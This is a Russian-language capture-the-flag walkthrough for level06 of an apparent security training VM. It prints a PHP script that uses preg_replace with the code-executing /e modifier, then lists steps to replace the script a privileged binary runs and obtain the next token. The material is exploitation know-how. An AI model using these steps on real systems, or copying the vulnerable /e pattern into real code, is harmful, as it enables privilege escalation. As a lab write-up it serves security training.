Вводим команду для перехода к следующему уровню

>>su level06
>>viuaaale9huek52boumoomioc (токен полученный на предыдущем уровне)

Переходим по пути 

>>cd ~
>>ls 

Видим исполняемый файл level06 и level06.php

>>cat level06.php

#!/usr/bin/php 
<?php
function y($m) { 
	$m = preg_replace("/\./", " x ", $m); 
	$m = preg_replace("/@/", " y", $m); 
	return $m; }

function x($y, $z) { 
	$a = file_get_contents($y); 
	$a = preg_replace("/(\[x (.*)\])/e", "y(\"\\2\")", $a); 
	$a = preg_replace("/\[/", "(", $a); 
	$a = preg_replace("/\]/", ")", $a); 
	return $a; }

$r = x($argv[1], $argv[2]); 
print $r;
?>

В нем есть уязвимость в использовании устаревшей функции preg_replace("/(\[x (.*)\])/e" с модификатором /e, можно воспользоваться ей.
Но мы узнали, что исполняемый файл использует файл с php скриптом. И запускает его от имени пользователя level06 
Соответственно мы можем создать свой php скрипт
Изменяем права и удаляем скрипт

>>chmod 777 .
>>rm -rf level06.php

Переносим наш скрипт в эту папку (пишем команду в терминале системы)

>>scp -P 4242 ./level06/Ressources/level06.php level06@192.168.0.17:~

Возвращаемся в сессию level06 и запускаем исполняемый файл

>>./level06

Получили токен wiok45aaoguiboiki2tuin6ub